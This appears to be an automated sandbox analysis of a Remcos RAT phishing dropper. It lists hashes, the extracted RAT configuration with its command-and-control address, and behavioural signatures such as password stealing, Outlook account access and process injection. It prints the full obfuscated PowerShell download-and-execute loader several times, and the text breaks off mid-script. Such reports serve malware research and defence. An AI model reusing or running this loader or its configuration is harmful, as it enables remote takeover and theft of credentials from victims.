Analysis
-
max time kernel
208s -
max time network
204s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-10-2024 09:33
Static task
static1
Behavioral task
behavioral1
Sample
16102024_0737_KULI500796821_PO20000003.gz
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
16102024_0737_KULI500796821_PO20000003.gz
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
KULI500796821_PO20000003.vbs
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
KULI500796821_PO20000003.vbs
Resource
win10v2004-20241007-en
General
-
Target
16102024_0737_KULI500796821_PO20000003.gz
-
Size
5KB
-
MD5
2be872c561b36ed6077935b39549a5d2
-
SHA1
5f809712be7c0aef0c83150981f5c7a266115d52
-
SHA256
c441c4a1730f4f007d600a25dc94f5ce892cd1c313cce3c213b669f9566fbc81
-
SHA512
e2782fd577062464a6bd33d85dc0768a1c52918adb5205c0f80b869bce5c10394c08a09a146a6392396d1948680ade25d59632972a14a3ba011f168ced1da63c
-
SSDEEP
96:0NP4qw/C4xq32sFWVvYUO8ntDCAOD2M83stEmfJbT5r1bn0/Ey+ixmsVJ8DhnH:o4qw/C4a2sFYvzjtDbOws3NrN0cy+SJ0
Malware Config
Extracted
remcos
RemoteHost
185.174.101.218:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-TKX1UQ
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/2332-151-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/4528-157-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/3964-160-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/4528-157-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2332-151-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 12 IoCs
flow pid Process 26 3356 powershell.exe 43 552 msiexec.exe 44 4276 msiexec.exe 46 552 msiexec.exe 47 4276 msiexec.exe 54 552 msiexec.exe 55 552 msiexec.exe 56 552 msiexec.exe 57 552 msiexec.exe 59 552 msiexec.exe 62 1604 msiexec.exe 63 3528 msiexec.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
pid Process 2364 powershell.exe 1052 powershell.exe 3356 powershell.exe 4452 powershell.exe 4004 powershell.exe 4828 powershell.exe 3384 powershell.exe 4952 powershell.exe -
pid Process 2364 powershell.exe 1052 powershell.exe 3356 powershell.exe 4452 powershell.exe 4004 powershell.exe 4828 powershell.exe 3384 powershell.exe 4952 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
pid Process 552 msiexec.exe 4276 msiexec.exe 1604 msiexec.exe 3528 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 4004 powershell.exe 4828 powershell.exe 4276 msiexec.exe 552 msiexec.exe 4952 powershell.exe 1604 msiexec.exe 1052 powershell.exe 3528 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 552 set thread context of 2332 552 msiexec.exe 128 PID 552 set thread context of 4528 552 msiexec.exe 131 PID 552 set thread context of 3964 552 msiexec.exe 132 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings 7zFM.exe -
Suspicious behavior: EnumeratesProcesses 55 IoCs
pid Process 4948 7zFM.exe 4948 7zFM.exe 3356 powershell.exe 3356 powershell.exe 4948 7zFM.exe 4948 7zFM.exe 4452 powershell.exe 4452 powershell.exe 4452 powershell.exe 4948 7zFM.exe 4948 7zFM.exe 4004 powershell.exe 4004 powershell.exe 4004 powershell.exe 4948 7zFM.exe 4948 7zFM.exe 4948 7zFM.exe 4948 7zFM.exe 4828 powershell.exe 4828 powershell.exe 4828 powershell.exe 4004 powershell.exe 4828 powershell.exe 4948 7zFM.exe 4948 7zFM.exe 3384 powershell.exe 3384 powershell.exe 3384 powershell.exe 4948 7zFM.exe 4948 7zFM.exe 4948 7zFM.exe 4948 7zFM.exe 4952 powershell.exe 4952 powershell.exe 4948 7zFM.exe 4948 7zFM.exe 4952 powershell.exe 2364 powershell.exe 2364 powershell.exe 2364 powershell.exe 4952 powershell.exe 4948 7zFM.exe 4948 7zFM.exe 4948 7zFM.exe 4948 7zFM.exe 1052 powershell.exe 1052 powershell.exe 1052 powershell.exe 2332 msiexec.exe 2332 msiexec.exe 3964 msiexec.exe 3964 msiexec.exe 2332 msiexec.exe 2332 msiexec.exe 1052 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4948 7zFM.exe 552 msiexec.exe -
Suspicious behavior: MapViewOfSection 9 IoCs
pid Process 4004 powershell.exe 4828 powershell.exe 552 msiexec.exe 552 msiexec.exe 552 msiexec.exe 552 msiexec.exe 552 msiexec.exe 4952 powershell.exe 1052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeRestorePrivilege 4948 7zFM.exe Token: 35 4948 7zFM.exe Token: SeSecurityPrivilege 4948 7zFM.exe Token: SeDebugPrivilege 3356 powershell.exe Token: SeSecurityPrivilege 4948 7zFM.exe Token: SeDebugPrivilege 4452 powershell.exe Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeSecurityPrivilege 4948 7zFM.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeSecurityPrivilege 4948 7zFM.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 3964 msiexec.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 4948 7zFM.exe 4948 7zFM.exe 4948 7zFM.exe 4948 7zFM.exe 4948 7zFM.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 552 msiexec.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 4948 wrote to memory of 4256 4948 7zFM.exe 97 PID 4948 wrote to memory of 4256 4948 7zFM.exe 97 PID 4256 wrote to memory of 3356 4256 WScript.exe 99 PID 4256 wrote to memory of 3356 4256 WScript.exe 99 PID 4948 wrote to memory of 5048 4948 7zFM.exe 104 PID 4948 wrote to memory of 5048 4948 7zFM.exe 104 PID 5048 wrote to memory of 4452 5048 WScript.exe 105 PID 5048 wrote to memory of 4452 5048 WScript.exe 105 PID 4948 wrote to memory of 3968 4948 7zFM.exe 113 PID 4948 wrote to memory of 3968 4948 7zFM.exe 113 PID 3968 wrote to memory of 3384 3968 WScript.exe 116 PID 3968 wrote to memory of 3384 3968 WScript.exe 116 PID 4004 wrote to memory of 552 4004 powershell.exe 118 PID 4004 wrote to memory of 552 4004 powershell.exe 118 PID 4004 wrote to memory of 552 4004 powershell.exe 118 PID 4004 wrote to memory of 552 4004 powershell.exe 118 PID 4828 wrote to memory of 4276 4828 powershell.exe 119 PID 4828 wrote to memory of 4276 4828 powershell.exe 119 PID 4828 wrote to memory of 4276 4828 powershell.exe 119 PID 4828 wrote to memory of 4276 4828 powershell.exe 119 PID 4948 wrote to memory of 4300 4948 7zFM.exe 120 PID 4948 wrote to memory of 4300 4948 7zFM.exe 120 PID 4300 wrote to memory of 2364 4300 WScript.exe 123 PID 4300 wrote to memory of 2364 4300 WScript.exe 123 PID 552 wrote to memory of 2332 552 msiexec.exe 128 PID 552 wrote to memory of 2332 552 msiexec.exe 128 PID 552 wrote to memory of 2332 552 msiexec.exe 128 PID 552 wrote to memory of 2332 552 msiexec.exe 128 PID 552 wrote to memory of 3972 552 msiexec.exe 129 PID 552 wrote to memory of 3972 552 msiexec.exe 129 PID 552 wrote to memory of 3972 552 msiexec.exe 129 PID 552 wrote to memory of 3056 552 msiexec.exe 130 PID 552 wrote to memory of 3056 552 msiexec.exe 130 PID 552 wrote to memory of 3056 552 msiexec.exe 130 PID 552 wrote to memory of 4528 552 msiexec.exe 131 PID 552 wrote to memory of 4528 552 msiexec.exe 131 PID 552 wrote to memory of 4528 552 msiexec.exe 131 PID 552 wrote to memory of 4528 552 msiexec.exe 131 PID 552 wrote to memory of 3964 552 msiexec.exe 132 PID 552 wrote to memory of 3964 552 msiexec.exe 132 PID 552 wrote to memory of 3964 552 msiexec.exe 132 PID 552 wrote to memory of 3964 552 msiexec.exe 132 PID 4952 wrote to memory of 1604 4952 powershell.exe 133 PID 4952 wrote to memory of 1604 4952 powershell.exe 133 PID 4952 wrote to memory of 1604 4952 powershell.exe 133 PID 4952 wrote to memory of 1604 4952 powershell.exe 133 PID 1052 wrote to memory of 3528 1052 powershell.exe 134 PID 1052 wrote to memory of 3528 1052 powershell.exe 134 PID 1052 wrote to memory of 3528 1052 powershell.exe 134 PID 1052 wrote to memory of 3528 1052 powershell.exe 134
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\16102024_0737_KULI500796821_PO20000003.gz"1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zO453A0387\KULI500796821_PO20000003.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tinklings Interplant Caecilia #>;$Eskimologi='Incumbence';<#Polychord seams Antistreptococcin #>;$Fordelingsnglen=$Glairin+$host.UI;function slushiest($Giganternes193){If ($Fordelingsnglen) {$Yogist++;}$Musikskole=$Loritas22+$Giganternes193.'Length'-$Yogist; for( $Gastrogastrotomy=3;$Gastrogastrotomy -lt $Musikskole;$Gastrogastrotomy+=4){$Pseudosematic++;$Menageries+=$Giganternes193[$Gastrogastrotomy];$Arteriomotor='Disendowment';}$Menageries;}function Unroots($Pilot){ & ($Fravaer) ($Pilot);}$Attributafhngighedernes215=slushiest ',leM io s z MoiRenlFodlBaraObi/Ant ';$Attributafhngighedernes215+=slushiest 'En 5inf.,ar0Tra No,( erW .diKrenGrudsovoU swBrasHus st,N FaTTa. Hin1s r0Csp.Gas0 n; ap rWDisi ysnDef6 na4 Br;Gr, Tidxg n6 To4C c;,le spr.acv,aa: bu1sav3suc1sla.In 0Unl)A t PolG oe Ovc Hokbldosol/ Af2O e0Z g1tub0Fli0Blo1Ban0sky1Ind MakFAlgi ExrUnce refDi o R xCr /siz1Tid3A t1sm .Cot0Und ';$Discern=slushiest ',beuUdksOveeAmmRMei-BakaAl.G dgEOveN .aTRn, ';$Fluktueret=slushiest 'sp hRydtEkstUnrp,ris yd:Osc/ Bl/U ogFdeePren Lga ArsTra.Un g dhrBoa/burbLigsKorq No1ple/KonMsu yU oe,aslAldo ess raP or uscsteoModmMenaPlo.st t iat Cof Ar ';$Engagerede30=slushiest '.al> sl ';$Fravaer=slushiest ' reIAddeQ.iXtsa ';$Rettighedskrav='Hundige';$Hvl='\Nonterminous.Gys';Unroots (slushiest 'Unt$T lGHabL ,iOfjoBBrnaV.rLPo : BiBHalRLone Bipf.rls maru,N B,sUndB FoaLaxa ,uDkrie ,vNAfb=Tan$ oE,ylNUn v .o:Gypa Arp BapsalDAnia F T mA He+Vet$FirhTvrv onlK.m ');Unroots (slushiest 'spy$ AdgHu.LFiloRecb cha onlOf :AigsspaKtalOKhovu blUrobkage ArRInrnDumE BesAch=til$Re,fWeslFeuUWilkdivT skuChiEhy R.hoe TrtUnb.UapsslipC.rlFogI gtA.l(Up.$HisE ChnTa.gPaaAmilgInhETacr grEstrDdele Ne3Fil0di )Utz ');Unroots (slushiest 'Ask[ComnTitEVactEsk.As,sPr eRedr JuvEnkIAdrC raEdiaP,oroTheIAf.NOp,T EumMe a ,anI vaBalgDe e DiRF.r] Pe:Kem:Ka,s aebu C stUEneRRi iUriTso Yst P UhrJusoso.TF roU dcMisO F LIns n= Do Az [DecnforETurT In. egsGele blcsh UForR oI ToT muYsuppDurRToeo iTlokoA hc ko.irlRagtOmdy odPsoce C ] Ga:Ren:PaaT BrlUnbsCho1Unj2,la ');$Fluktueret=$skovlbernes[0];$Phoneticize=(slushiest 'Pro$FrdgAf lAneo.arbRabAAnkL re:Ra sPolKRapjV tON dL.erdpa e uNF le au=comnsilEWawW v -IndoAf BCirj tee NaCTrat Ab DetsBloyRadsVaaT M eshamsub. kunBeaEFa.Tuni.UtiwLeveLyabsy c DaLIrriIdeEc,en Z tF l ');Unroots ($Phoneticize);Unroots (slushiest 'Pr.$Plas epkEu jbefoIssl AfdstieApon drespn.TanHgyle AfaPr,d,ndedemr s sEgo[ski$IroDferiIm sGr.cNi eU yrUn n B,]M l= C $AnmARejtCont isrH risambBloustyt lkaIn,f JyhBarnFlygA kiPe g rhGaseDoedKuleTomr YansoleCits st2Tr,1Byw5 ru ');$spinny13=slushiest 'Ask$Pats akTesjBroo splTifd.aleB nn D,eEu..PreDPinoFakwAren TrlMicoKliaTrsdAttFovei CalCireCo ( a$ DrF hylsteuAn kDelt diuRatePolrGuleBootFo., o$Pans Holhari C dVagbCa aHexnAppeDes) Re ';$slidbane=$Breplansbaaden;Unroots (slushiest ' Fl$GrsG lol B ORo BKryADi lGan: hnOceEWasDAstts vUTe,RGenE VeN Pae s.ssen=Byg(Bo tJrleHers VaTD l- R p raADehtDe hkll Ta.$Wats ElLindi ynDUn,BPr,askaN sme H )Tyk ');while (!$Nedturenes) {Unroots (slushiest ',ni$ edgNonlreso.ombM na.ehlL n:Ca BHjseThes stkConrGraesljr.ursOveaBlak s slausge.=Vej$ Cot,ilrThiuBileGau ') ;Unroots $spinny13;Unroots (slushiest 'Mats ReTVina LirEsmT ki-RamsPedl esE HjE .ePAl sk 4 sl ');Unroots (slushiest 'Fal$,neGEetLBjeoFribs ras.bLsa :MolNs.mE U dWintMenuKorRproE stNEkseHarsKoa=Que(Prit paeAntsChaTM,n-strpCogA eT nthVgr I i$PyrsAmtLNo iM gd WobCraa apnAtmePu )For ') ;Unroots (slushiest ' Ba$CaugChulcanO anBFo,aKonL .n:knisMaaOFigLVe Fskardife Lsd,edsAf,=Pri$GrigUroLCenOPrebstrAB,dLcos:ForfR.frstrebisMRass Goi BrGKamELugll.vsuncE VisAcc+ a+.ar%spe$Clos ,sKBraO aV ibLsp,bCayEs.brs.mnB ue Das sa.Gl c T o.epUAn.NZygTR.m ') ;$Fluktueret=$skovlbernes[$solfreds];}$Frkrigstidernes=321286;$Feist=28101;Unroots (slushiest ' py$ Veg.malstaO roB uaE pLDig: TabValRsale.yoMBa sBloEIodskryPTriOMaeRVolsAnt Dan= se samGMisEMolt.ar- HyCFeloHann PrtMenEFu nTjrTUn, Upt$ rusReplBrei.amDji,bNonAForN OpeIvy ');Unroots (slushiest '.er$ eg CilGrno sabNemaBo,l ia:TrslRecic lcT.leUron ots L aCi bU olFo e Ov Ove=mig st[AblsRapy busZymt L,eskem Ta..ouCLano AdnR,gvGlie DerIndtAg ] el:the:JarFNa rP loColm utBAnaaBessForeca 6job4s,nsPyrtEftrBjeiP onKnsg hi(Nu $PogB AmrMi eT kmDissKwae egsFurpGa.oLaer Iss p )Ami ');Unroots (slushiest 'Vag$ BuGkajLCalo uB h aMicLcal:MonsstakshiOHineKunnGe.sPaa Uf=Cer gud[Cyss ,aYFrasUp.tN bE BiMsup. p TAireD pxUdkT er.Looe itNKalCB.soReiD ,eIunmnjazgB g]fag:Und:CitaPiesEquC api.omiU.d. slGTelE,mbTs rsEudTspiRAnaI teNal.Gbla(Org$ DkL BaI,isCMacE siNAngsUndas ib.esLUngEBef)Pr ');Unroots (slushiest 'Be $ ArgUnlLResOKimBPhoAIhulLou:T ns Bre .uasubffyrAPaaRDanEudp=Pul$ Gas OpkOpsOKraEFisnsk sMun.udssRhyUskibD ds eTLa rOmki uNhowgAlb(r.h$ Flfstar adk exRse,IsttgBess ,otsygIOveDundeCapr HanB ne frs jl, Dk$DawFMare nlIBatsUdkTDel) Ty ');Unroots $seafare;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3356
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zO4535B4A7\KULI500796821_PO20000003.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tinklings Interplant Caecilia #>;$Eskimologi='Incumbence';<#Polychord seams Antistreptococcin #>;$Fordelingsnglen=$Glairin+$host.UI;function slushiest($Giganternes193){If ($Fordelingsnglen) {$Yogist++;}$Musikskole=$Loritas22+$Giganternes193.'Length'-$Yogist; for( $Gastrogastrotomy=3;$Gastrogastrotomy -lt $Musikskole;$Gastrogastrotomy+=4){$Pseudosematic++;$Menageries+=$Giganternes193[$Gastrogastrotomy];$Arteriomotor='Disendowment';}$Menageries;}function Unroots($Pilot){ & ($Fravaer) ($Pilot);}$Attributafhngighedernes215=slushiest ',leM io s z MoiRenlFodlBaraObi/Ant ';$Attributafhngighedernes215+=slushiest 'En 5inf.,ar0Tra No,( erW .diKrenGrudsovoU swBrasHus st,N FaTTa. Hin1s r0Csp.Gas0 n; ap rWDisi ysnDef6 na4 Br;Gr, Tidxg n6 To4C c;,le spr.acv,aa: bu1sav3suc1sla.In 0Unl)A t PolG oe Ovc Hokbldosol/ Af2O e0Z g1tub0Fli0Blo1Ban0sky1Ind MakFAlgi ExrUnce refDi o R xCr /siz1Tid3A t1sm .Cot0Und ';$Discern=slushiest ',beuUdksOveeAmmRMei-BakaAl.G dgEOveN .aTRn, ';$Fluktueret=slushiest 'sp hRydtEkstUnrp,ris yd:Osc/ Bl/U ogFdeePren Lga ArsTra.Un g dhrBoa/burbLigsKorq No1ple/KonMsu yU oe,aslAldo ess raP or uscsteoModmMenaPlo.st t iat Cof Ar ';$Engagerede30=slushiest '.al> sl ';$Fravaer=slushiest ' reIAddeQ.iXtsa ';$Rettighedskrav='Hundige';$Hvl='\Nonterminous.Gys';Unroots (slushiest 'Unt$T lGHabL ,iOfjoBBrnaV.rLPo : BiBHalRLone Bipf.rls maru,N B,sUndB FoaLaxa ,uDkrie ,vNAfb=Tan$ oE,ylNUn v .o:Gypa Arp BapsalDAnia F T mA He+Vet$FirhTvrv onlK.m ');Unroots (slushiest 'spy$ AdgHu.LFiloRecb cha onlOf :AigsspaKtalOKhovu blUrobkage ArRInrnDumE BesAch=til$Re,fWeslFeuUWilkdivT skuChiEhy R.hoe TrtUnb.UapsslipC.rlFogI gtA.l(Up.$HisE ChnTa.gPaaAmilgInhETacr grEstrDdele Ne3Fil0di )Utz ');Unroots (slushiest 'Ask[ComnTitEVactEsk.As,sPr eRedr JuvEnkIAdrC raEdiaP,oroTheIAf.NOp,T EumMe a ,anI vaBalgDe e DiRF.r] Pe:Kem:Ka,s aebu C stUEneRRi iUriTso Yst P UhrJusoso.TF roU dcMisO F LIns n= Do Az [DecnforETurT In. egsGele blcsh UForR oI ToT muYsuppDurRToeo iTlokoA hc ko.irlRagtOmdy odPsoce C ] Ga:Ren:PaaT BrlUnbsCho1Unj2,la ');$Fluktueret=$skovlbernes[0];$Phoneticize=(slushiest 'Pro$FrdgAf lAneo.arbRabAAnkL re:Ra sPolKRapjV tON dL.erdpa e uNF le au=comnsilEWawW v -IndoAf BCirj tee NaCTrat Ab DetsBloyRadsVaaT M eshamsub. kunBeaEFa.Tuni.UtiwLeveLyabsy c DaLIrriIdeEc,en Z tF l ');Unroots ($Phoneticize);Unroots (slushiest 'Pr.$Plas epkEu jbefoIssl AfdstieApon drespn.TanHgyle AfaPr,d,ndedemr s sEgo[ski$IroDferiIm sGr.cNi eU yrUn n B,]M l= C $AnmARejtCont isrH risambBloustyt lkaIn,f JyhBarnFlygA kiPe g rhGaseDoedKuleTomr YansoleCits st2Tr,1Byw5 ru ');$spinny13=slushiest 'Ask$Pats akTesjBroo splTifd.aleB nn D,eEu..PreDPinoFakwAren TrlMicoKliaTrsdAttFovei CalCireCo ( a$ DrF hylsteuAn kDelt diuRatePolrGuleBootFo., o$Pans Holhari C dVagbCa aHexnAppeDes) Re ';$slidbane=$Breplansbaaden;Unroots (slushiest ' Fl$GrsG lol B ORo BKryADi lGan: hnOceEWasDAstts vUTe,RGenE VeN Pae s.ssen=Byg(Bo tJrleHers VaTD l- R p raADehtDe hkll Ta.$Wats ElLindi ynDUn,BPr,askaN sme H )Tyk ');while (!$Nedturenes) {Unroots (slushiest ',ni$ edgNonlreso.ombM na.ehlL n:Ca BHjseThes stkConrGraesljr.ursOveaBlak s slausge.=Vej$ Cot,ilrThiuBileGau ') ;Unroots $spinny13;Unroots (slushiest 'Mats ReTVina LirEsmT ki-RamsPedl esE HjE .ePAl sk 4 sl ');Unroots (slushiest 'Fal$,neGEetLBjeoFribs ras.bLsa :MolNs.mE U dWintMenuKorRproE stNEkseHarsKoa=Que(Prit paeAntsChaTM,n-strpCogA eT nthVgr I i$PyrsAmtLNo iM gd WobCraa apnAtmePu )For ') ;Unroots (slushiest ' Ba$CaugChulcanO anBFo,aKonL .n:knisMaaOFigLVe Fskardife Lsd,edsAf,=Pri$GrigUroLCenOPrebstrAB,dLcos:ForfR.frstrebisMRass Goi BrGKamELugll.vsuncE VisAcc+ a+.ar%spe$Clos ,sKBraO aV ibLsp,bCayEs.brs.mnB ue Das sa.Gl c T o.epUAn.NZygTR.m ') ;$Fluktueret=$skovlbernes[$solfreds];}$Frkrigstidernes=321286;$Feist=28101;Unroots (slushiest ' py$ Veg.malstaO roB uaE pLDig: TabValRsale.yoMBa sBloEIodskryPTriOMaeRVolsAnt Dan= se samGMisEMolt.ar- HyCFeloHann PrtMenEFu nTjrTUn, Upt$ rusReplBrei.amDji,bNonAForN OpeIvy ');Unroots (slushiest '.er$ eg CilGrno sabNemaBo,l ia:TrslRecic lcT.leUron ots L aCi bU olFo e Ov Ove=mig st[AblsRapy busZymt L,eskem Ta..ouCLano AdnR,gvGlie DerIndtAg ] el:the:JarFNa rP loColm utBAnaaBessForeca 6job4s,nsPyrtEftrBjeiP onKnsg hi(Nu $PogB AmrMi eT kmDissKwae egsFurpGa.oLaer Iss p )Ami ');Unroots (slushiest 'Vag$ BuGkajLCalo uB h aMicLcal:MonsstakshiOHineKunnGe.sPaa Uf=Cer gud[Cyss ,aYFrasUp.tN bE BiMsup. p TAireD pxUdkT er.Looe itNKalCB.soReiD ,eIunmnjazgB g]fag:Und:CitaPiesEquC api.omiU.d. slGTelE,mbTs rsEudTspiRAnaI teNal.Gbla(Org$ DkL BaI,isCMacE siNAngsUndas ib.esLUngEBef)Pr ');Unroots (slushiest 'Be $ ArgUnlLResOKimBPhoAIhulLou:T ns Bre .uasubffyrAPaaRDanEudp=Pul$ Gas OpkOpsOKraEFisnsk sMun.udssRhyUskibD ds eTLa rOmki uNhowgAlb(r.h$ Flfstar adk exRse,IsttgBess ,otsygIOveDundeCapr HanB ne frs jl, Dk$DawFMare nlIBatsUdkTDel) Ty ');Unroots $seafare;"3⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zO45317EC7\KULI500796821_PO20000003.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tinklings Interplant Caecilia #>;$Eskimologi='Incumbence';<#Polychord seams Antistreptococcin #>;$Fordelingsnglen=$Glairin+$host.UI;function slushiest($Giganternes193){If ($Fordelingsnglen) {$Yogist++;}$Musikskole=$Loritas22+$Giganternes193.'Length'-$Yogist; for( $Gastrogastrotomy=3;$Gastrogastrotomy -lt $Musikskole;$Gastrogastrotomy+=4){$Pseudosematic++;$Menageries+=$Giganternes193[$Gastrogastrotomy];$Arteriomotor='Disendowment';}$Menageries;}function Unroots($Pilot){ & ($Fravaer) ($Pilot);}$Attributafhngighedernes215=slushiest ',leM io s z MoiRenlFodlBaraObi/Ant ';$Attributafhngighedernes215+=slushiest 'En 5inf.,ar0Tra No,( erW .diKrenGrudsovoU swBrasHus st,N FaTTa. Hin1s r0Csp.Gas0 n; ap rWDisi ysnDef6 na4 Br;Gr, Tidxg n6 To4C c;,le spr.acv,aa: bu1sav3suc1sla.In 0Unl)A t PolG oe Ovc Hokbldosol/ Af2O e0Z g1tub0Fli0Blo1Ban0sky1Ind MakFAlgi ExrUnce refDi o R xCr /siz1Tid3A t1sm .Cot0Und ';$Discern=slushiest ',beuUdksOveeAmmRMei-BakaAl.G dgEOveN .aTRn, ';$Fluktueret=slushiest 'sp hRydtEkstUnrp,ris yd:Osc/ Bl/U ogFdeePren Lga ArsTra.Un g dhrBoa/burbLigsKorq No1ple/KonMsu yU oe,aslAldo ess raP or uscsteoModmMenaPlo.st t iat Cof Ar ';$Engagerede30=slushiest '.al> sl ';$Fravaer=slushiest ' reIAddeQ.iXtsa ';$Rettighedskrav='Hundige';$Hvl='\Nonterminous.Gys';Unroots (slushiest 'Unt$T lGHabL ,iOfjoBBrnaV.rLPo : BiBHalRLone Bipf.rls maru,N B,sUndB FoaLaxa ,uDkrie ,vNAfb=Tan$ oE,ylNUn v .o:Gypa Arp BapsalDAnia F T mA He+Vet$FirhTvrv onlK.m ');Unroots (slushiest 'spy$ AdgHu.LFiloRecb cha onlOf :AigsspaKtalOKhovu blUrobkage ArRInrnDumE BesAch=til$Re,fWeslFeuUWilkdivT skuChiEhy R.hoe TrtUnb.UapsslipC.rlFogI gtA.l(Up.$HisE ChnTa.gPaaAmilgInhETacr grEstrDdele Ne3Fil0di )Utz ');Unroots (slushiest 'Ask[ComnTitEVactEsk.As,sPr eRedr JuvEnkIAdrC raEdiaP,oroTheIAf.NOp,T EumMe a ,anI vaBalgDe e DiRF.r] Pe:Kem:Ka,s aebu C stUEneRRi iUriTso Yst P UhrJusoso.TF roU dcMisO F LIns n= Do Az [DecnforETurT In. egsGele blcsh UForR oI ToT muYsuppDurRToeo iTlokoA hc ko.irlRagtOmdy odPsoce C ] Ga:Ren:PaaT BrlUnbsCho1Unj2,la 